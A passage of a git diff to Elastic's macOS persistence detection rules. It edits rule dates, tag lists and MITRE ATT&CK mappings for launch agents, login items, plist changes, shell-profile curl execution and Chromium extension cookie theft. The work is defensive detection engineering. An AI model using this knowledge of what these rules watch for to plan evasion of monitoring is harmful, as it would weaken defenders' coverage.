"T1204" + reference = "https://attack.mitre.org/techniques/T1204/" diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index 7ad252a6bd9..25970d8647b 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/21" [rule] author = ["Elastic"] @@ -100,18 +100,19 @@ Launch Agents in macOS are used to execute scripts or applications automatically [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index ac0eaca6c1d..1dd6607c7eb 100644 --- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -43,7 +43,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -89,18 +97,43 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.015" -name = "Login Items" -reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 018ccfaa192..15e61637816 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -48,7 +48,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,26 +103,19 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.002" +name = "Authentication Package" +reference = "https://attack.mitre.org/techniques/T1547/002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 3f1779cb36f..7be128e76cb 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -81,30 +81,30 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Event Triggered Execution" + id = "T1546" + reference = "https://attack.mitre.org/techniques/T1546/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell Configuration Modification" + id = "T1546.004" + reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 67553e9d6fd..1feff70a4d6 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -103,41 +103,36 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 42daa3071bf..60cccae6d72 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,18 +102,14 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1547.009" -name = "Shortcut Modification" -reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index bd1836e5468..5e06d5edddf 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -90,26 +97,19 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 43ae3627d71..49dd1c7435c 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,36 +101,36 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index ad0e9957b10..4f500cad3cc 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,13 +102,14 @@ Finder Sync plugins enhance macOS Finder by allowing third-party applications to [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 832dfbbeb8d..46944a678eb 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -45,7 +45,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -93,13 +101,26 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml index f2211c46f55..607ab2f4f82 100644 --- a/rules/macos/persistence_hidden_plist_filename.toml +++ b/rules/macos/persistence_hidden_plist_filename.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -87,40 +87,45 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" + [[rule.threat.technique]] + name = "Boot or Logon Autostart Execution" + id = "T1547" + reference = "https://attack.mitre.org/techniques/T1547/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "Plist Modification" + id = "T1547.011" + reference = "https://attack.mitre.org/techniques/T1547/011/" + + [[rule.threat.technique]] + name = "Create or Modify System Process" + id = "T1543" + reference = "https://attack.mitre.org/techniques/T1543/" + + [[rule.threat.technique.subtechnique]] + name = "Launch Agent" + id = "T1543.001" + reference = "https://attack.mitre.org/techniques/T1543/001/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" + + [[rule.threat.technique]] + name = "Hide Artifacts" + id = "T1564" + reference = "https://attack.mitre.org/techniques/T1564/" + + [[rule.threat.technique.subtechnique]] + name = "Hidden Files and Directories" + id = "T1564.001" + reference = "https://attack.mitre.org/techniques/T1564/001/" diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 59365456675..40020db35c3 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -108,18 +108,14 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.002" -name = "Login Hook" -reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index d3fc418339c..7603cbada1f 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -67,18 +67,26 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1037.002" -name = "Login Hook" -reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index b22050039bd..245e2cd90cc 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -23,7 +23,15 @@ references = [ risk_score = 73 rule_id = "f1f3070e-045c-4e03-ae58-d11d43d2ee51" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -78,17 +86,25 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1176" -name = "Software Extensions" -reference = "https://attack.mitre.org/techniques/T1176/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" + + [[rule.threat.technique]] + name = "Software Extensions" + id = "T1176" + reference = "https://attack.mitre.org/techniques/T1176/" + +[[rule.threat]] +framework = "MITRE ATT&CK" -[[rule.threat.technique.subtechnique]] -id = "T1176.001" -name = "Browser Extensions" -reference = "https://attack.mitre.org/techniques/T1176/001/" + [rule.threat.tactic] + name = "Credential Access" + id = "TA0006" + reference = "https://attack.mitre.org/tactics/TA0006/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Steal Web Session Cookie" + id = "T1539" + reference = "https://attack.mitre.org/techniques/T1539/" diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index acb351b0c87..003ac42c087 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,13 +101,19 @@ Periodic tasks in macOS are scheduled operations that automate system maintenanc [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 5aa6e70b92d..2c5cd8c4634 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml +++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -73,26 +73,20 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 570027ab544..44791980400 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,18 +101,14 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.002" -name = "Screensaver" -reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_startup_item_plist_creation.toml b/rules/macos/persistence_startup_item_plist_creation.toml index cecfc474f78..0ff3d1f2258 100644 --- a/rules/macos/persistence_startup_item_plist_creation.toml +++ b/rules/macos/persistence_startup_item_plist_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -23,7 +23,14 @@ references = [ risk_score = 73 rule_id = "15606250-449d-46a8-aaff-4043e42aefb9" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -73,35 +80,17 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.005" -name = "Startup Items" -reference = "https://attack.mitre.org/techniques/T1037/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat.technique.subtechnique]] -id = "T1037.005" -name = "Startup Items" -reference = "https://attack.mitre.org/techniques/T1037/005/" + [[rule.threat.technique]] + name = "Boot or Logon Initialization Scripts" + id = "T1037" + reference = "https://attack.mitre.org/techniques/T1037/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat.technique.subtechnique]] + name = "Startup Items" + id = "T1037.005" + reference = "https://attack.mitre.org/techniques/T1037/005/" diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index b1de5ec77cb..eff66a14bca 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,13 +102,14 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index 9110c01cb84..ca5bd4627c0 100644 --- 